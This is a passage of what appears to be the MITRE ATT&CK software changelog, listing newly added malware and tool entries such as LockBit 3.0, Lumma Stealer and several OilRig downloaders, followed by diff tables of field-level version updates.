Line Dancer is a memory-only Lua-based shellcode loader associated with the ArcaneDoor campaign. Line Dancer allows an adversary to upload and execute arbitrary shellcode on victim devices.(Citation: Cisco ArcaneDoor 2024)(Citation: CCCS ArcaneDoor 2024)
[S1188] Line Runner
Current version: 1.0
Description:
Line Runner is a persistent backdoor and web shell allowing threat actors to upload and execute arbitrary Lua scripts. Line Runner is associated with the ArcaneDoor campaign.(Citation: CCCS ArcaneDoor 2024)(Citation: Cisco ArcaneDoor 2024)
[S1199] LockBit 2.0
Current version: 1.0
Description:
LockBit 2.0 is an affiliate-based Ransomware-as-a-Service (RaaS) that has been in use since at least June 2021 as the successor to LockBit Ransomware. LockBit 2.0 has versions capable of infecting Windows and VMware ESXi virtual machines, and has been observed targeting multiple industry verticals globally.(Citation: FBI Lockbit 2.0 FEB 2022)(Citation: Palo Alto Lockbit 2.0 JUN 2022)
[S1202] LockBit 3.0
Current version: 1.0
Description:
LockBit 3.0 is an evolution of the LockBit Ransomware-as-a-Service (RaaS) offering with similarities to BlackMatter and BlackCat ransomware. LockBit 3.0 has been in use since at least June 2022 and features enhanced defense evasion and exfiltration tactics, robust encryption methods for Windows and VMware ESXi systems, and a more refined RaaS structure over its predecessors such as LockBit 2.0.(Citation: Sentinel Labs LockBit 3.0 JUL 2022)(Citation: Joint Cybersecurity Advisory LockBit JUN 2023)(Citation: Joint Cybersecurity Advisory LockBit 3.0 MAR 2023)(Citation: INCIBE-CERT LockBit MAR 2024)
[S1213] Lumma Stealer
Current version: 1.0
Description:
Lumma Stealer is an information stealer malware family in use since at least 2022. Lumma Stealer is a Malware as a Service (MaaS) where captured data has been sold in criminal markets to Initial Access Brokers.(Citation: Cybereason LumaStealer Undated)(Citation: Netskope LummaStealer 2025)(Citation: Qualys LummaStealer 2024)(Citation: Fortinet LummaStealer 2024)(Citation: TrendMicro LummaStealer 2025)
[S1182] MagicRAT
Current version: 1.0
Description:
MagicRAT is a remote access tool developed in C++ and exclusively used by the Lazarus Group threat actor in operations. MagicRAT allows for arbitrary command execution on victim machines and provides basic remote access functionality.(Citation: Cisco MagicRAT 2022)
[S1169] Mango
Current version: 1.0
Description:
Mango is a first-stage backdoor written in C#/.NET that was used by OilRig during the Juicy Mix campaign. Mango is the successor to Solar and includes additional exfiltration capabilities, the use of native APIs, and added detection evasion code.(Citation: ESET OilRig Campaigns Sep 2023)
[S1191] Megazord
Current version: 1.0
Description:
Megazord is a Rust-based variant of Akira ransomware that has been in use since at least August 2023 to target Windows environments. Megazord has been attributed to the Akira group based on overlapping infrastructure though is possibly not exclusive to the group.(Citation: CISA Akira Ransomware APR 2024)(Citation: Cisco Akira Ransomware OCT 2024)(Citation: Palo Alto Howling Scorpius DEC 2024)
[S1192] NICECURL
Current version: 1.0
Description:
NICECURL is a VBScript-based backdoor used by APT42 to download additional modules.(Citation: Mandiant APT42-untangling)
[S1189] Neo-reGeorg
Current version: 1.0
Description:
Neo-reGeorg is an open-source web shell designed as a restructuring of reGeorg with improved usability, security, and fixes for exising reGeorg bugs.(Citation: GitHub Neo-reGeorg 2019)
[S1170] ODAgent
Current version: 1.0
Description:
ODAgent is a C#/.NET downloader that has been used by OilRig since at least 2022 including against target organizations in Israel to download and execute payloads and to exfiltrate staged files.(Citation: ESET OilRig Downloaders DEC 2023)
[S1172] OilBooster
Current version: 1.0
Description:
OilBooster is a downloader written in Microsoft Visual C/C++ that has been used by OilRig since at least 2022 including against target organizations in Israel to download and execute files and for exfiltration.(Citation: ESET OilRig Downloaders DEC 2023)
[S1171] OilCheck
Current version: 1.0
Description:
OilCheck is a C#/.NET downloader that has been used by OilRig since at least 2022 including against targets in Israel. OilCheck uses draft messages created in a shared email account for C2 communication.(Citation: ESET OilRig Downloaders DEC 2023)
[S1173] PowerExchange
Current version: 1.0
Description:
PowerExchange is a PowerShell backdoor that has been used by OilRig since at least 2023 including against government targets in the Middle East.(Citation: Symantec Crambus OCT 2023)
[S1209] Quick Assist
Current version: 1.0
Description:
Quick Assist is a remote assistance tool primarily for Microsoft Windows, although a macOS version also exists. Quick Assist allows for remote screen sharing and, with end user approval, remote control and command execution on the enabling device.(Citation: Microsoft Storm-1811 2024)(Citation: Microsoft Quick Assist 2024)
[S1212] RansomHub
Current version: 1.0
Description:
RansomHub is a ransomware-as-a-service (RaaS) offering with Windows, ESXi, Linux, and FreeBSD versions that has been in use since at least 2024 to target organizations in multiple sectors globally. RansomHub operators may have purchased and rebranded resources from Knight (formerly Cyclops) Ransomware which shares infrastructure, feature, and code overlaps with RansomHub.(Citation: CISA RansomHub AUG 2024)(Citation: Group-IB RansomHub FEB 2025)
[S1210] Sagerunex
Current version: 1.0
Description:
Sagerunex is a malware family exclusively associated with Lotus Blossom operations, with variants existing since at least 2016. Variations of Sagerunex leverage non-traditional command and control mechanisms such as various web services.(Citation: Symantec Bilbug 2022)(Citation: Cisco LotusBlossom 2025)
[S1168] SampleCheck5000
Current version: 1.0
Description:
SampleCheck5000 is a downloader with multiple variants that was used by OilRig including during the Outer Space campaign to download and execute additional payloads. (Citation: ESET OilRig Campaigns Sep 2023)(Citation: ESET OilRig Downloaders DEC 2023)
[S1178] ShrinkLocker
Current version: 1.0
Description:
ShrinkLocker is a VBS-based malicious script that leverages the legitimate Bitlocker application to encrypt files on victim systems for ransom. ShrinkLocker functions by using Bitlocker to encrypt files, then renames impacted drives to the adversary’s contact email address to facilitate communication for the ransom payment.(Citation: Kaspersky ShrinkLocker 2024)(Citation: Splunk ShrinkLocker 2024)
[S1163] SnappyTCP
Current version: 1.0
Description:
SnappyTCP is a web shell used by Sea Turtle between 2021 and 2023 against multiple victims. SnappyTCP appears to be based on a public GitHub project that has since been removed from the code-sharing site. SnappyTCP includes a simple reverse TCP shell for Linux and Unix environments with basic command and control capabilities.(Citation: PWC Sea Turtle 2023)
[S1166] Solar
Current version: 1.0
Description:
Solar is a C#/.NET backdoor that was used by OilRig during the Outer Space campaign to download, execute, and exfiltrate files.(Citation: ESET OilRig Campaigns Sep 2023)
[S1200] StealBit
Current version: 1.0
Description:
StealBit is a data exfiltration tool that is developed and maintained by the operators of the the LockBit Ransomware-as-a-Service (RaaS) and offered to affiliates to exfiltrate data from compromised systems for double extortion purposes.(Citation: Cybereason StealBit Exfiltration Tool)(Citation: FBI Lockbit 2.0 FEB 2022)
[S1183] StrelaStealer
Current version: 1.0
Description:
StrelaStealer is an information stealer malware variant first identified in November 2022 and active through late 2024. StrelaStealer focuses on the automated identification, collection, and exfiltration of email credentials from email clients such as Outlook and Thunderbird.(Citation: DCSO StrelaStealer 2022)(Citation: PaloAlto StrelaStealer 2024)(Citation: Fortgale StrelaStealer 2023)(Citation: IBM StrelaStealer 2024)
[S1193] TAMECAT
Current version: 1.0
Description:
TAMECAT is a malware that is used by APT42 to execute PowerShell or C# content.(Citation: Mandiant APT42-untangling)
[S1201] TRANSLATEXT
Current version: 1.0
Description:
TRANSLATEXT is malware that is believed to be used by Kimsuky.(Citation: Zscaler Kimsuky TRANSLATEXT) TRANSLATEXT masqueraded as a Google Translate extension for Google Chrome, but is actually a collection of four malicious Javascript files that perform defense evasion, information collection and exfiltration.(Citation: Zscaler Kimsuky TRANSLATEXT)
[S1196] Troll Stealer
Current version: 1.0
Description:
Troll Stealer is an information stealer written in Go associated with Kimsuky operations. Troll Stealer has typically been delivered through a dropper disguised as a legitimate security program installation file. Troll Stealer features code similar to AppleSeed, also uniquely associated with Kimsuky operations.(Citation: S2W Troll Stealer 2024)(Citation: Symantec Troll Stealer 2024)
[S1164] UPSTYLE
Current version: 1.0
Description:
UPSTYLE is a Python-based backdoor associated with exploitation of Palo Alto firewalls using CVE-2024-3400 in early 2024. UPSTYLE has only been observed in relation to this exploitation activity, which involved attempted install on compromised devices by the threat actor UTA0218.(Citation: Volexity UPSTYLE 2024)(Citation: Palo Alto MidnightEclipse APR 2024)
[S1207] XLoader
Current version: 1.0
Description:
XLoader is an infostealer malware in use since at least 2016. Previously known and sometimes still referred to as Formbook, XLoader is a Malware as a Service (MaaS) known for stealing data from web browsers, email clients and File Transfer Protocol (FTP) applications.(Citation: Zscaler XLoader 2025)(Citation: ANY.RUN XLoader 2023)(Citation: CheckPoint XLoader 2022)(Citation: Acronis XLoader 2021)(Citation: Google XLoader 2017)
[S1176] attrib
Current version: 1.0
Description:
attrib is a Windows utility used to display, set or remove attributes assigned to files or directories.(Citation: Microsoft attrib 2023)
[S1204] cd00r
Current version: 1.0
Description:
cd00r is an open-source backdoor for UNIX and UNIX-variant operating systems that was orginally released in 2000. cd00r source code is primarily based on a packet-capturing program as it utilizes a sniffer to listen for specific sequences of network traffic or "secret knock" before executing the attacker's code.(Citation: Hartrell cd00r 2002)(Citation: Lumen J-Magic JAN 2025)
[S1205] cipher.exe
Current version: 1.0
Description:
cipher.exe is a native Microsoft utility that manages encryption of directories and files on NTFS (New Technology File System) partitions by using the Encrypting File System (EFS).(Citation: cipher.exe)
[S1187] reGeorg
Current version: 1.0
Description:
reGeorg is an open-source web shell written in Python that can be used as a proxy to bypass firewall rules and tunnel data in and out of targeted networks.(Citation: Fortinet reGeorg MAR 2019)(Citation: GitHub reGeorg 2016)
Major Version Changes
[S1129] Akira
Current version: 2.0
Version changed from: 1.0 → 2.0
|
|
|---|
| t | [Akira](https://attack.mitre.org/software/S1129) ransomware, | t | [Akira](https://attack.mitre.org/software/S1129) ransomware, |
| written in C++, is most prominently (but not exclusively) a | | written in C++, is most prominently (but not exclusively) a |
| ssociated with the a ransomware-as-a-service entity [Akira]( | | ssociated with the ransomware-as-a-service entity [Akira](ht |
| https://attack.mitre.org/groups/G1024).(Citation: Kersten Ak | | tps://attack.mitre.org/groups/G1024). [Akira](https://attack |
| ira 2023) | | .mitre.org/software/S1129) ransomware has been used in attac |
| | | ks across North America, Europe, and Australia, with a focus |
| | | on critical infrastructure sectors including manufacturing, |
| | | education, and IT services. [Akira](https://attack.mitre.or |
| | | g/software/S1129) ransomware employs hybrid encryption and t |
| | | hreading to increase the speed and efficiency of encryption |
| | | and runtime arguments for tailored attacks. Notable variants |
| | | include Rust-based [Megazord](https://attack.mitre.org/soft |
| | | ware/S1191) for targeting Windows and [Akira _v2](https://at |
| | | tack.mitre.org/software/S1194) for targeting VMware ESXi ser |
| | | vers.(Citation: Kersten Akira 2023)(Citation: CISA Akira Ran |
| | | somware APR 2024)(Citation: Cisco Akira Ransomware OCT 2024) |
Details
dictionary_item_added| STIX Field | Old value | New Value |
|---|
| x_mitre_contributors | | ['Jiraput Thamsongkrah'] |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2024-04-08 17:17:49.947000+00:00 | 2025-03-11 15:37:13.258000+00:00 |
| description | [Akira](https://attack.mitre.org/software/S1129) ransomware, written in C++, is most prominently (but not exclusively) associated with the a ransomware-as-a-service entity [Akira](https://attack.mitre.org/groups/G1024).(Citation: Kersten Akira 2023) | [Akira](https://attack.mitre.org/software/S1129) ransomware, written in C++, is most prominently (but not exclusively) associated with the ransomware-as-a-service entity [Akira](https://attack.mitre.org/groups/G1024). [Akira](https://attack.mitre.org/software/S1129) ransomware has been used in attacks across North America, Europe, and Australia, with a focus on critical infrastructure sectors including manufacturing, education, and IT services. [Akira](https://attack.mitre.org/software/S1129) ransomware employs hybrid encryption and threading to increase the speed and efficiency of encryption and runtime arguments for tailored attacks. Notable variants include Rust-based [Megazord](https://attack.mitre.org/software/S1191) for targeting Windows and [Akira _v2](https://attack.mitre.org/software/S1194) for targeting VMware ESXi servers.(Citation: Kersten Akira 2023)(Citation: CISA Akira Ransomware APR 2024)(Citation: Cisco Akira Ransomware OCT 2024) |
| x_mitre_version | 1.0 | 2.0 |
iterable_item_added| STIX Field | Old value | New Value |
|---|
| external_references | | {'source_name': 'CISA Akira Ransomware APR 2024', 'description': 'CISA et al. (2024, April 18). #StopRansomware: Akira Ransomware. Retrieved December 10, 2024.', 'url': 'https://www.cisa.gov/sites/default/files/2024-04/aa24-109a-stopransomware-akira-ransomware_2.pdf'} |
| external_references | | {'source_name': 'Cisco Akira Ransomware OCT 2024', 'description': 'Nutland, J. and Szeliga, M. (2024, October 21). Akira ransomware continues to evolve. Retrieved December 10, 2024.', 'url': 'https://blog.talosintelligence.com/akira-ransomware-continues-to-evolve/'} |
[S0633] Sliver
Current version: 2.0
Version changed from: 1.2 → 2.0
|
|
|---|
| t | [Sliver](https://attack.mitre.org/software/S0633) is an open | t | [Sliver](https://attack.mitre.org/software/S0633) is an open |
| source, cross-platform, red team command and control framew | | source, cross-platform, red team command and control (C2) f |
| ork written in Golang.(Citation: Bishop Fox Sliver Framework | | ramework written in Golang. [Sliver](https://attack.mitre.or |
| August 2019) | | g/software/S0633) includes its own package manager, "armory, |
| | | " for staging and downloading additional tools and payloads |
| | | to the primary C2 framework.(Citation: Bishop Fox Sliver Fra |
| | | mework August 2019)(Citation: Cybereason Sliver Undated) |
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2024-04-11 00:06:01.264000+00:00 | 2025-03-24 16:00:41.005000+00:00 |
| description | [Sliver](https://attack.mitre.org/software/S0633) is an open source, cross-platform, red team command and control framework written in Golang.(Citation: Bishop Fox Sliver Framework August 2019) | [Sliver](https://attack.mitre.org/software/S0633) is an open source, cross-platform, red team command and control (C2) framework written in Golang. [Sliver](https://attack.mitre.org/software/S0633) includes its own package manager, "armory," for staging and downloading additional tools and payloads to the primary C2 framework.(Citation: Bishop Fox Sliver Framework August 2019)(Citation: Cybereason Sliver Undated) |
| x_mitre_version | 1.2 | 2.0 |
iterable_item_added| STIX Field | Old value | New Value |
|---|
| external_references | | {'source_name': 'Cybereason Sliver Undated', 'description': 'Cybereason Global SOC and Incident Response Team. (n.d.). Sliver C2 Leveraged by Many Threat Actors. Retrieved March 24, 2025.', 'url': 'https://www.cybereason.com/blog/sliver-c2-leveraged-by-many-threat-actors'} |
| x_mitre_contributors | | Kyaw Pyiyt Htet, @KyawPyiytHtet |
Minor Version Changes
[S1125] AcidRain
Current version: 1.1
Version changed from: 1.0 → 1.1
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2024-04-12 10:20:50.199000+00:00 | 2025-04-15 19:46:33.099000+00:00 |
| x_mitre_version | 1.0 | 1.1 |
| x_mitre_platforms[0] | Network | Network Devices |
[S1161] BPFDoor
Current version: 1.1
Version changed from: 1.0 → 1.1
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2024-09-23 21:26:40.646000+00:00 | 2025-01-03 18:03:04.670000+00:00 |
| x_mitre_version | 1.0 | 1.1 |
[S1118] BUSHWALK
Current version: 1.1
Version changed from: 1.0 → 1.1
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2024-03-28 19:04:24.485000+00:00 | 2025-04-15 19:46:33.793000+00:00 |
| x_mitre_version | 1.0 | 1.1 |
| x_mitre_platforms[0] | Network | Network Devices |
[S0606] Bad Rabbit
Current version: 1.1
Version changed from: 1.0 → 1.1
|
|
|---|
| t | [Bad Rabbit](https://attack.mitre.org/software/S0606) is a s | t | [Bad Rabbit](https://attack.mitre.org/software/S0606) is a s |
| elf-propagating ransomware that affected the Ukrainian trans | | elf-propagating ransomware that affected the Ukrainian trans |
| portation sector in 2017. [Bad Rabbit](https://attack.mitre. | | portation sector in 2017. [Bad Rabbit](https://attack.mitre. |
| org/software/S0606) has also targeted organizations and cons | | org/software/S0606) has also targeted organizations and cons |
| umers in Russia. (Citation: Secure List Bad Rabbit)(Citation | | umers in Russia. (Citation: Secure List Bad Rabbit)(Citation |
| : ESET Bad Rabbit)(Citation: Dragos IT ICS Ransomware) | | : ESET Bad Rabbit)(Citation: Dragos Apr 2019) |
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2022-10-12 17:29:57.200000+00:00 | 2025-01-02 19:45:31.402000+00:00 |
| description | [Bad Rabbit](https://attack.mitre.org/software/S0606) is a self-propagating ransomware that affected the Ukrainian transportation sector in 2017. [Bad Rabbit](https://attack.mitre.org/software/S0606) has also targeted organizations and consumers in Russia. (Citation: Secure List Bad Rabbit)(Citation: ESET Bad Rabbit)(Citation: Dragos IT ICS Ransomware) | [Bad Rabbit](https://attack.mitre.org/software/S0606) is a self-propagating ransomware that affected the Ukrainian transportation sector in 2017. [Bad Rabbit](https://attack.mitre.org/software/S0606) has also targeted organizations and consumers in Russia. (Citation: Secure List Bad Rabbit)(Citation: ESET Bad Rabbit)(Citation: Dragos Apr 2019) |
| external_references[3]['source_name'] | Dragos IT ICS Ransomware | Dragos Apr 2019 |
| external_references[3]['description'] | Slowik, J.. (2019, April 10). Implications of IT Ransomware for ICS Environments. Retrieved January 28, 2021. | Joe Slowik. (2019, April 10). Implications of IT Ransomware for ICS Environments. Retrieved October 27, 2019. |
| external_references[3]['url'] | https://www.dragos.com/blog/industry-news/implications-of-it-ransomware-for-ics-environments/ | https://dragos.com/blog/industry-news/implications-of-it-ransomware-for-ics-environments/ |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
| x_mitre_version | 1.0 | 1.1 |
[S1070] Black Basta
Current version: 1.1
Version changed from: 1.0 → 1.1
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-05-01 17:05:56.388000+00:00 | 2025-04-15 19:12:30.748000+00:00 |
| external_references[2]['description'] | Cyble. (2022, May 6). New ransomware variant targeting high-value organizations. Retrieved March 7, 2023. | Cyble. (2022, May 6). New ransomware variant targeting high-value organizations. Retrieved November 17, 2024. |
| external_references[2]['url'] | https://blog.cyble.com/2022/05/06/black-basta-ransomware/ | https://web.archive.org/web/20220506143054/https://blog.cyble.com/2022/05/06/black-basta-ransomware/ |
| x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
| x_mitre_version | 1.0 | 1.1 |
iterable_item_added| STIX Field | Old value | New Value |
|---|
| x_mitre_contributors | | Natthawut Saexu |
| x_mitre_platforms | | ESXi |
[S0521] BloodHound
Current version: 1.7
Version changed from: 1.6 → 1.7
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2024-09-25 20:33:37.892000+00:00 | 2025-03-12 20:27:03.654000+00:00 |
| x_mitre_version | 1.6 | 1.7 |
[S1105] COATHANGER
Current version: 1.1
Version changed from: 1.0 → 1.1
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2024-04-05 15:31:04.915000+00:00 | 2025-04-15 19:46:33.371000+00:00 |
| x_mitre_version | 1.0 | 1.1 |
| x_mitre_platforms[1] | Network | Network Devices |
[S1096] Cheerscrypt
Current version: 1.1
Version changed from: 1.0 → 1.1
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2024-04-15 23:22:28.176000+00:00 | 2025-04-15 19:12:30.368000+00:00 |
| x_mitre_version | 1.0 | 1.1 |
iterable_item_added| STIX Field | Old value | New Value |
|---|
| x_mitre_platforms | | ESXi |
[S0687] Cyclops Blink
Current version: 1.2
Version changed from: 1.1 → 1.2
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2024-08-15 22:36:30.074000+00:00 | 2025-04-15 19:46:35.048000+00:00 |
| x_mitre_version | 1.1 | 1.2 |
| x_mitre_platforms[0] | Network | Network Devices |
[S0367] Emotet
Current version: 1.7
Version changed from: 1.6 → 1.7
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2024-07-09 16:04:18.570000+00:00 | 2024-11-25 16:00:51.198000+00:00 |
| x_mitre_version | 1.6 | 1.7 |
[S1120] FRAMESTING
Current version: 1.1
Version changed from: 1.0 → 1.1
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2024-03-08 20:21:24.195000+00:00 | 2025-04-15 19:46:35.229000+00:00 |
| x_mitre_version | 1.0 | 1.1 |
| x_mitre_platforms[0] | Network | Network Devices |
[S1117] GLASSTOKEN
Current version: 1.1
Version changed from: 1.0 → 1.1
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2024-03-06 19:15:21.887000+00:00 | 2025-04-15 19:46:34.213000+00:00 |
| x_mitre_version | 1.0 | 1.1 |
| x_mitre_platforms[0] | Network | Network Devices |
[S0357] Impacket
Current version: 1.8
Version changed from: 1.7 → 1.8
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2024-10-07 19:08:53.273000+00:00 | 2025-04-04 17:16:12.597000+00:00 |
| x_mitre_version | 1.7 | 1.8 |
[S1119] LIGHTWIRE
Current version: 1.1
Version changed from: 1.0 → 1.1
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2024-03-28 19:18:39.684000+00:00 | 2025-04-15 19:46:34.303000+00:00 |
| x_mitre_version | 1.0 | 1.1 |
| x_mitre_platforms[0] | Network | Network Devices |
[S1121] LITTLELAMB.WOOLTEA
Current version: 1.1
Version changed from: 1.0 → 1.1
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2024-04-17 20:47:19.566000+00:00 | 2025-04-15 19:46:33.606000+00:00 |
| x_mitre_version | 1.0 | 1.1 |
| x_mitre_platforms[0] | Network | Network Devices |
[S0576] MegaCortex
Current version: 1.1
Version changed from: 1.0 → 1.1
Details
dictionary_item_added| STIX Field | Old value | New Value |
|---|
| x_mitre_deprecated | | False |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2021-04-26 13:39:41.601000+00:00 | 2025-03-10 19:49:50.935000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
| x_mitre_version | 1.0 | 1.1 |
[S0002] Mimikatz
Current version: 1.10
Version changed from: 1.9 → 1.10
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2024-09-25 20:34:58.387000+00:00 | 2024-11-27 21:53:57.705000+00:00 |
| x_mitre_version | 1.9 | 1.10 |
[S0039] Net
Current version: 2.7
Version changed from: 2.6 → 2.7
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2024-02-01 04:34:30.855000+00:00 | 2024-11-27 21:55:29.681000+00:00 |
| x_mitre_version | 2.6 | 2.7 |
[S1109] PACEMAKER
Current version: 1.1
Version changed from: 1.0 → 1.1
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2024-04-10 21:08:49.143000+00:00 | 2025-04-15 19:46:34.604000+00:00 |
| x_mitre_version | 1.0 | 1.1 |
| x_mitre_platforms[0] | Network | Network Devices |
[S1123] PITSTOP
Current version: 1.1
Version changed from: 1.0 → 1.1
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2024-04-17 23:08:23.989000+00:00 | 2025-04-15 19:46:35.647000+00:00 |
| x_mitre_version | 1.0 | 1.1 |
| x_mitre_platforms[0] | Network | Network Devices |
[S1108] PULSECHECK
Current version: 1.1
Version changed from: 1.0 → 1.1
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2024-04-10 21:06:18.500000+00:00 | 2025-04-15 19:46:34.866000+00:00 |
| x_mitre_version | 1.0 | 1.1 |
| x_mitre_platforms[0] | Network | Network Devices |
[S0013] PlugX
Current version: 3.2
Version changed from: 3.1 → 3.2
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-04-10 17:14:55.086000+00:00 | 2025-04-04 17:15:48.780000+00:00 |
| external_references[13]['url'] | http://labs.lastline.com/an-analysis-of-plugx | https://lastline3.rssing.com/chan-29044929/all_p1.html#c29044929a2 |
| x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
| x_mitre_version | 3.1 | 3.2 |
[S1084] QUIETEXIT
Current version: 1.1
Version changed from: 1.0 → 1.1
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-10-02 21:29:35.492000+00:00 | 2025-04-15 19:46:34.040000+00:00 |
| x_mitre_version | 1.0 | 1.1 |
| x_mitre_platforms[0] | Network | Network Devices |
[S1113] RAPIDPULSE
Current version: 1.1
Version changed from: 1.0 → 1.1
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2024-04-05 18:28:57.216000+00:00 | 2025-04-15 19:46:34.778000+00:00 |
| x_mitre_version | 1.0 | 1.1 |
| x_mitre_platforms[0] | Network | Network Devices |
[S1073] Royal
Current version: 1.1
Version changed from: 1.0 → 1.1
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-04-17 13:11:47.488000+00:00 | 2025-04-16 20:38:20.361000+00:00 |
| x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
| x_mitre_version | 1.0 | 1.1 |
iterable_item_added| STIX Field | Old value | New Value |
|---|
| x_mitre_platforms | | ESXi |
[S1110] SLIGHTPULSE
Current version: 1.1
Version changed from: 1.0 → 1.1
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2024-04-10 21:08:18.197000+00:00 | 2025-04-15 19:46:35.556000+00:00 |
| x_mitre_version | 1.0 | 1.1 |
| x_mitre_platforms[0] | Network | Network Devices |
[S1104] SLOWPULSE
Current version: 1.1
Version changed from: 1.0 → 1.1
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2024-02-08 19:58:16.715000+00:00 | 2025-04-15 19:46:35.817000+00:00 |
| x_mitre_version | 1.0 | 1.1 |
| x_mitre_platforms[0] | Network | Network Devices |
[S1112] STEADYPULSE
Current version: 1.1
Version changed from: 1.0 → 1.1
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2024-02-09 20:26:27.831000+00:00 | 2025-04-15 19:46:35.400000+00:00 |
| x_mitre_version | 1.0 | 1.1 |
| x_mitre_platforms[0] | Network | Network Devices |
[S0519] SYNful Knock
Current version: 1.1
Version changed from: 1.0 → 1.1
Details
dictionary_item_added| STIX Field | Old value | New Value |
|---|
| x_mitre_deprecated | | False |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2021-12-14 23:14:26.027000+00:00 | 2025-04-15 19:46:34.695000+00:00 |
| external_references[1]['description'] | Bill Hau, Tony Lee, Josh Homan. (2015, September 15). SYNful Knock - A Cisco router implant - Part I. Retrieved October 19, 2020. | Bill Hau, Tony Lee, Josh Homan. (2015, September 15). SYNful Knock - A Cisco router implant - Part I. Retrieved November 17, 2024. |
| external_references[1]['url'] | https://www.mandiant.com/resources/synful-knock-acis | https://cloud.google.com/blog/topics/threat-intelligence/synful-knock-acis/ |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
| x_mitre_version | 1.0 | 1.1 |
| x_mitre_platforms[0] | Network | Network Devices |
[S0183] Tor
Current version: 1.3
Version changed from: 1.2 → 1.3
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2022-10-05 16:37:49.999000+00:00 | 2025-03-25 22:52:49.139000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
| x_mitre_version | 1.2 | 1.3 |
[S1010] VPNFilter
Current version: 2.1
Version changed from: 2.0 → 2.1
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2024-08-15 22:01:22.169000+00:00 | 2025-04-15 19:46:34.471000+00:00 |
| x_mitre_version | 2.0 | 2.1 |
| x_mitre_platforms[0] | Network | Network Devices |
[S1154] VersaMem
Current version: 1.1
Version changed from: 1.0 → 1.1
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2024-09-28 09:58:35.558000+00:00 | 2025-04-15 19:46:33.283000+00:00 |
| x_mitre_version | 1.0 | 1.1 |
| x_mitre_platforms[0] | Network | Network Devices |
[S1116] WARPWIRE
Current version: 1.1
Version changed from: 1.0 → 1.1
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2024-03-29 14:53:25.984000+00:00 | 2025-04-15 19:46:34.954000+00:00 |
| x_mitre_version | 1.0 | 1.1 |
| x_mitre_platforms[0] | Network | Network Devices |
[S1115] WIREFIRE
Current version: 1.1
Version changed from: 1.0 → 1.1
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2024-03-05 18:40:41.264000+00:00 | 2025-04-15 19:46:35.314000+00:00 |
| x_mitre_version | 1.0 | 1.1 |
| x_mitre_platforms[0] | Network | Network Devices |
[S0658] XCSSET
Current version: 1.3
Version changed from: 1.2 → 1.3
|
|
|---|
| t | [XCSSET](https://attack.mitre.org/software/S0658) is a macOS | t | [XCSSET](https://attack.mitre.org/software/S0658) is a modul |
| modular backdoor that targets Xcode application developers. | | ar macOS malware family delivered through infected Xcode pro |
| [XCSSET](https://attack.mitre.org/software/S0658) was first | | jects and executed when the project is compiled. Active sinc |
| observed in August 2020 and has been used to install a back | | e August 2020, it has been observed installing backdoors, sp |
| door component, modify browser applications, conduct collect | | oofed browsers, collecting data, and encrypting user files. |
| ion, and provide ransomware-like encryption capabilities.(Ci | | It is composed of SHC-compiled shell scripts and run-only Ap |
| tation: trendmicro xcsset xcode project 2020) | | pleScripts, often hiding in apps that mimic system tools (su |
| | | ch as Xcode, Mail, or Notes) or use familiar icons (like Lau |
| | | nchpad) to avoid detection.(Citation: trendmicro xcsset xcod |
| | | e project 2020)(Citation: April 2021 TrendMicro XCSSET)(Cita |
| | | tion: Microsoft March 2025 XCSSET) |
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2022-10-18 20:40:59.749000+00:00 | 2025-04-04 17:39:46.453000+00:00 |
